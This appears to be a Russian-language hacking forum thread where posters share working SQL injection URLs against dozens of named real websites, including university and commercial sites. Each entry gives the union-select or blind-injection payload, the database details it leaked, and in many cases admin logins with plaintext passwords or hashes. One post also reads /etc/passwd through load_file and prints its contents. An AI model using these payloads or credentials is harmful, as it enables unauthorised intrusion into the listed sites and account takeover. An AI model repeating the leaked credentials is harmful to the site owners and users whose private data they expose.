Database Version: 5.0.45 Database name: rinkfinder User name: [email protected] root : 304c680c7bea9e43 хэш MySQL : 304c680c7bea9e43 : trainwreck На Винде 2003 2ip показал 161 сайт. Database Version: 5.0.68-log Database name: lautrecafmyBd User name: [email protected] :[email protected] :fb [email protected] :jmoqtw56 :[email protected] :bghlnrsv :[email protected] :cgkx3578 :[email protected] :df7frt2p :[email protected] :cefhkrs7 :[email protected] :blostxz1 :[email protected] :deguvz17 :[email protected]:uytz9lh3 :[email protected] :ghuvyz37 :[email protected] :eqrvxz56 ГРУППЫ КОДЕРОВ НА ПХП-)) PageRank = 6 Database Version: 5.0.18-standard Database name: phpuserg User name: phpuserg@localhost
Code: http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() guZsp4@localhost:gEm1Zn:4.1.22-log Admin Account Code: admin:Vpa4M9ql http://www.gemeni.com.ua/admin --------------------------------------------------------------------------------------- Code: http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() drgngdpua_dGu3@localhost:drgngdpua_dgB9:5.0.67-community Admin Account Code: admin:s6Mzp1sB8Ag4Jq http://dr-gng.dp.ua/admin --------------------------------------------------------------------------------------- Code: http://www.med-tech.kiev.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() culkin_mtuK4c1@localhost:culkin_mtchZ5d:5.0.67-community Admin Account Code: admin:f7maLp3V6mZzt6fpsR http://med-tech.kiev.ua/admin --------------------------------------------------------------------------------------- Code: http://forex-4-all.ru/ndex.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() dzubaa_FpR5U@localhost:dzubaa_frX4fs:4.1.22-standard Admin Account Code: admin:jp4Clz9S http://forex-4-all.ru/admin --------------------------------------------------------------------------------------- Code: http://scotland.org.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() qwertyadm1_rma6l@localhost:qwertyadm1_scOtL:5.0.67-community Admin Account Code: admin:paLz5C9qm1 http://scotland.org.ua/admin --------------------------------------------------------------------------------------- Code: http://russia-forex.ru/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() dzubaa_fRux0F@localhost:dzubaa_RfuL4m:4.1.22-standard Admin Account Code: admin:iKd8B1kzf6 http://russia-forex.ru/admin --------------------------------------------------------------------------------------- Code: http://www.cooler.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() drgngdpua_Cu2L6@localhost:drgngdpua_C2ol3a:5.0.67-community Admin Account Code: admin:PV4mAG3Ck http://www.cooler.dp.ua/admin --------------------------------------------------------------------------------------- Code: http://www.bfstimul.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf),2,3,4,concat(0x3c623e7573657228293a646174616261736528293a76657273696f6e28293a3c2f623e203c693e,user(),0x3a,database(),0x3a,version())+from+rkh8t5po user():database():version() drgngdpua_bfU5v@localhost:drgngdpua_bfDn4:5.0.67-community Admin Account Code: admin:f5Jma2KpX http://www.bfstimul.dp.ua/admin
http://www.supercalculatoare.com/compara.php?ID=-5730+union+select+1,2,3,version(),user(),6,7,8,9,0,11,12,13,14,15-- Database Version: 5.0.67-community-log Database Name: super User name: super@localhost
Code: http://www.greywolves.co.uk/page.php?pid=13%20union%20select%201,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10%20from%20mysql.user-- mysql.user truststfc:6d6e0e253af1fe4f file_priv=N =(
www.agenpulsa.info PageRank 4 PHP: http://www.agenpulsa.info/mod.php?mod=publisher&op=viewarticle&artid=-1+union+select+1,2,3,group_concat(concat_ws(0x3A,uname,pass)+SEPARATOR+0x3c62723e),5,6,7,8,9,10,11+from+users-- www.alsofwah.or.id PageRank 5 PHP: http://www.alsofwah.or.id/cetakberita.php?id=-78++union+select+1,concat_ws(0x3A,user,password,email),3,4,5,6,7,8+from+u2842_alsofwah.user+--+
Code: http://www.mfcspartak-mo.ru/index.php?id=-1+union+select+1,2,concat_ ws(0x3a,version( ),database(),user()),4,5,6,7-- Database Version : 4.0.27-max-log Database name : mfcspart_book User name : [email protected] --------------------------------------------------------# Code: http://www.armfootball.com/index.php?Page=News&Lang=Rus&ID=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5-- Database Version : 5.0.67-community Database name : nareco_armfootball User name : nareco_root@localhost
Code: http://www.idibaps.ub.edu/eng/equipo.php?anyo=2001&arid=2&id=-13+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71/* http://profusion.bu.edu/techlab/modules/references/view_author.php?id=-109+union+select+1,concat(user,0x3a,password),3,0x776861636b,5,6,7,8,9,10+from+mysql.user http://www.housing.wisc.edu/resnet/news/story.php?id=-109+union+select+1,2,3,4,5,concat(user,0x3a,password),7,8,9,10+from+mysql.user+limit+0,1 http://dvaction.northwestern.edu/parentdetail.php?id=109+AND+ascii(lower(substring(version(),1,1)))=53 http://www.ece.virginia.edu/profiles.php?ID=-109+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21 http://depts.washington.edu/mcb/facultyinfo.php?id=-109+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
ТИЦ : 1100 Code: http://www.tourtrans.ru/index.php?page=news&id=-1+union+select+1,2,concat _ws(0x3a, version(),database(),user ())-- Database Version : 4.0.27-log Database name : tteurope User name : [email protected] ---------------------------------------------------# PR: 5 тИЦ: 950 Code: http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),use r()),6,7,8,9,10,11,12,13,14,15,16,17-- Database Version : 5.0.67-log Database name : solvex-travel_ru User name : [email protected] Code: http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,table _name,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.tables+limit+0,1-- 50 столбцов, но юзверей я что-то так и не нашел (((
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+version()),1,1))=x/* x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,100 http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+database()),1,1))=x/* x=115,121,115,116,101,109,112,95,115,112 http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+user()),1,1))=x/* x=115,121,115,116,101,109,112,95,115,112,64,108,111,99,97,108,104,111,115,116 Version : 4.1.22-standard Database : systemp_sp User : systemp_sp@localhost
aib.in.ua вывод в title PHP: http://aib.in.ua/objav/car/?id=-1+union+select+1,2,3,concat_ws(0x3A,@@version,user(),database())+--+ www.architectuurcentrumnijmegen.nl PageRank - 4 PHP: http://www.architectuurcentrumnijmegen.nl/default.php?menu=-99999/**/union/**/select/**/unhex(hex(version()))/* www.merkur.ba PageRank - 4 PHP: http://www.merkur.ba/aktuelno/vijest.php?id=-155+union+select+unhex(hex(@@version)),2,3,4,5,6+--+ www.pave.fr PageRank - 5 PHP: http://www.pave.fr/sections.php3?op=viewarticle&artid=-255+union+select+1,2,@@version,4,5+--+ www.apci.asso.fr PageRank - 7, это самое большее количество колонок c которым я только вcтречался(135): PHP: http://www.apci.asso.fr/l_observeur/realisation.php?id=-281+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,unhex(hex(concat_ws(0x3A,@@version,user(),database()))),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135+--+ www.arnaudmontebourg.fr PageRank - 4 вывод в title PHP: http://www.arnaudmontebourg.fr/web/nav/article.php?id=425+union+select+concat_ws(user(),@@version,database()),2,3,4+--+
! новичкам посвящается...смотрим что ошибки нет , но идём дальше ..не сдаемся http://www.cg-gc.ro/cgro/product.php?id_product=-753' http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- Database Version: 5.0.51b-log Database name: cg_comert User name: webdesign@localhost http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+load_file(0x2F6574632F706173737764),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7-- root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: operator:x:11:0perator:/root:/bin/bash ftp:x:14:50::/home/ftp: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash nobody:x:99:99:nobody:/: design:x:1000:100::/home/design:/bin/bash ceftac:x:1001:100::/home/design/websites/ceftac:/usr/libexec/sftp-server mihai:x:1003:100:,,,:/home/mihai:/bin/bash smmsp:x:25:25:smmsp:/var/spool/clientmqueue: stefan.simon:x:1004:100::/home/stefan:/bin/bash noemi:x:1005:100::/home/design/websites/cggc/download:/usr/libexec/sftp-server apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false http://www.cg-gc.ro/cgro/product.php?id_product=-753+UNION+SELECT+CONCAT_WS(0x3a,id,username,parola),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+cg.admini+LIMIT+1,1-- 10:corina:0fb9fe42465a3bba 2:florin:*51D2FAEA3257E9A8F8A03DE0DDD63064714239A9 3:fmakai:3519dfb35bfb1071 4:mbadici:1f27f0166150ae6c 5:Cristi:1fd2ce501c6fc21b 9:cornel:301f3d5a629c8bbf 11:corneliu:04c63dc1449c6ee3 13:mihain:413854603fb8058d 14: oana:4f9f544d12d2175e noemi:60ab75b07c05f0b2 16:cosmin:4a76bb876d218975 27:consumabile:6e174a6035b92e82 28: pressroom:1dce0b286052aba9 29:xfilez:43e9a4ab75570f5b 18:[email protected]:*C14F97B95A5580BFC49025850E7B8A907E05BBE4 23:loredana:0836d7b259d2893a 20:dorina:7b3c27ed548e8681 21:admin:6c05b43422e2603d 24:marius:789d1ccf4e8f52a2 25:valentinp:6475ff2774a36508 26:gsm:7a2dd7a521e0dd43 30:eudis:1abcf14c12a3b2ef
www.novibeograd.info PageRank - 3 PHP: http://www.novibeograd.info/index.php?strana=vest&id=1+union+select+1,concat_ws(0x3A,memberName,passwd,passwordSalt),3,4,5+from+novibgd_forum.smf_members+--+ Сам форум здеся http://www.novibeograd.info/smf/ www.dadaprod.org PageRank - 4 PHP: http://www.dadaprod.org/index.php?mode=samizdat&id=-25+union+select+1,2,3,4,concat_ws(0x3a,user_level,user_nom,user_pwd),6,7,8,9,10,11,12+from+dadaprod_www.dc_user+--+ www.fonora.com PageRank - 4 PHP: http://www.fonora.com/index.php?page=product&id=25+union+select+concat_ws(0x3A,user(),@@version,database()),2+--+&lang=fr
Code: http://pfsa.unsa.ba PR: 5 Тиц: 0 Версия: 4.1.20 База данных: adminpfsa Юзверь: adminpfsa@localhost Code: http://www.pfsa.unsa.ba/stream/stream.php?kat=-1%20union%20select%201,2,3,4,5,6,7,8,9-- Админка: https://195.130.35.116:19638/siteadmin/?ocw_login_domain=pfsa.unsa.ba
PR : 5 ТИЦ : 1000 Code: http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,12,13,14-- Database Version : 5.1.30 Database name : matchfishing2 User name : matchfishing2@localhost админ: Code: http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a,login,password),6,7,8,9,10,11,12,13,14+ from+ssrusers+limit+0,1-- Code: radugin:3nyov1 админка: Code: http://www.matchfishing.ru/admin/ в админке есть много чего
http://www.isoline.ro/index.php?p=view&show=-10+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3-- Database Version: 5.0.67-log Database name: isoline User name: [email protected]
http://www.artlink.org.ro/index.php?p=view&show=-71+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a,version(),database(),user()))),7,8,9--&lang=1 Version : 4.1.11-Debian_4sarge8 Database : artlink_org_ro User : [email protected]
www.xogospopulares.com Pagerank - 4 PHP: http://www.xogospopulares.com/foro/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users%20where%20user_id=1/* www.lorianevoyages.be Pagerank - 3 PHP: http://www.lorianevoyages.be/destinations.php?id=-42+union+select+concat_ws(0x3a,user(),@@version)+--+
сайт на Mambo'ском двиге: Code: http://www.ilcamper.it/Mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11+from+mos_users-- логин/пасс: Code: admin:e9e92f1dcb4c8927db6a81a498be68de Code: hallelujah:059223504eda24f466bea046fb2de347 Code: http://www.ilcamper.it/Mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11+from+mos_users-- юзер/версия/бд: Code: 4.0.27-standard-log:[email protected]:Sql6820 ------------------------------------------------------------------- The End
